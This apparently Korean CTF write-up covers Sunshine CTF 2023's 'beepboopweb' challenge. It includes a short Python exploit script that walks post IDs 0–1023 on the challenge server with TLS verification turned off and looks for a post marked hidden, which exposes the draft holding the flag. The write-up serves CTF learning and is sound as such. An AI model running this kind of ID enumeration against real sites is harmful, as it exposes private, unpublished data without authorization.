[sunshine CTF 2023] beepboopweb Writeup

현재는 열리지 않지만, 해당 블로그에 들어가면 로봇이 작성한 매우 많은 글들이 있다.

해당 글들에는 #000 과 같은 번호로 글이 작성되어있다.

 

힌트에 있듯이 초안에 flag가 있다고 했는데, #000은 보이지 않았다. 

/post/0 으로 직접 데이터를 받아왔는데 req header에 hidden 속성이 있었다. hidden : false 인 글들만 보이는걸로 보아 hidden:True 인 걸 찾으면 되지 않을까 했다. 따라서 총 글의 수가 1023이니, 1023까지 get을 하며 hidden 이 true인 것을 찾으면 되겠다고 생각했다.

 

익스플로잇 코드

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

for i in range(1024):
    print(f"Trying {i}")
    url = f"https://beepboop.web.2023.sunshinectf.games/post/{i}/"
    try:
        response = requests.get(url, verify=False)
    except requests.exceptions.SSLError:
        continue
    if "hidden\":true" in response.text:
        print(f"Found hidden post at {url}")
        print(response.text)
        break

 

 

성공!